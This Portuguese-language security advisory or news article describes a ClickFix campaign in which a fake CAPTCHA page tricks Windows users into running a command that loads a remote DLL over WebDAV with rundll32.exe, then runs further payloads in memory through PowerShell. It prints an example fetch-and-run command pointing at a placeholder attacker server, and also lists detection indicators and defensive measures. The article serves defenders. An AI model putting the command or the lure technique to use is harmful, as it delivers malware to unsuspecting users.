Uma nova e mais perigosa versão da técnica de ataque ClickFix foi encontrada atacando ativamente usuários Windows. Ao contrário das versões anteriores que usavam PowerShell ou mshta para executar comandos maliciosos, esta nova variante segue um caminho diferente. Ela usa rundll32.exe e WebDAV, dois componentes nativos do Windows, para entregar e executar payloads prejudiciais silenciosamente sem acionar a maioria dos alertas de segurança comuns.
A evolução da técnica ClickFix
Os ataques ClickFix são conhecidos por enganar usuários para executarem comandos maliciosos em seus próprios computadores. Neste caso, o atacante configura um site falso disfarçado como uma página de verificação de CAPTCHA. O site instrui o visitante a pressionar Win + R para abrir o diálogo Executar do Windows, colar um comando pré-copiado e pressionar Enter. Todo o processo parece inofensivo para alguém não familiarizado com como esses ataques funcionam.
Uso de componentes nativos do Windows
Em vez de chamar o PowerShell diretamente no início, o ataque usa rundll32.exe com o mini-redirecionador WebDAV, que permite que o Windows acesse arquivos remotos via HTTP como se estivessem armazenados em um compartilhamento de rede local. Isso significa que o arquivo DLL malicioso é puxado de um servidor controlado pelo atacante usando um comando como rundll32.exe \server@80\verification.google,#1, onde o #1 se refere a uma função de exportação usando um número ordinal em vez de um nome legível.
Cadeia de ataque e execução em memória
O que torna essa variante do ClickFix especialmente complicada é como ela lida com tudo após o primeiro comando. Uma vez que o rundll32.exe busca e carrega o DLL remoto via WebDAV, a infecção move-se para um processo de múltiplas etapas que permanece quase inteiramente na memória. A cadeia transita para o PowerShell em uma etapa posterior, usando Invoke-Expression (IEX) para puxar e executar payloads adicionais sem escrever arquivos no disco. O payload principal é um carregador secundário chamado SkimokKeep.
Indicadores de comprometimento
As equipes de segurança são fortemente aconselhadas a monitorar todas as execuções de rundll32.exe que incluem argumentos davclnt.dll e DavSetCookie, pois isso é um forte indicador de entrega de payload baseada em WebDAV. É necessário implementar auditoria de linha de comando para LOLBins conhecidos, incluindo rundll32.exe, para capturar padrões de uso incomuns. É preciso bloquear conexões para endereços IP maliciosos conhecidos e domínios suspeitos identificados na campanha.
Medidas de defesa recomendadas
Restrinja ou monitore de perto o tráfego WebDAV de saída na porta 80 onde não é operacionalmente necessário. Melhore o treinamento de conscientização do usuário focado especificamente em páginas de CAPTCHA falsas e ataques de engenharia social estilo ClickFix, pois o sucesso dessa campanha depende inteiramente de um usuário seguir as instruções na tela. A implementação de políticas de controle de aplicação e monitoramento de injeção de processo é essencial.
Conclusão e impacto na segurança
A mudança para o uso de componentes nativos do Windows torna o ataque mais difícil de capturar, especialmente para organizações cujas defesas se concentram principalmente em detectar ameaças baseadas em scripts. A capacidade do malware de se misturar à atividade normal do Windows devido ao uso do rundll32.exe fornece um ponto de entrada limpo para o atacante. A vigilância contínua e a atualização das regras de detecção são fundamentais para mitigar essa evolução da técnica ClickFix.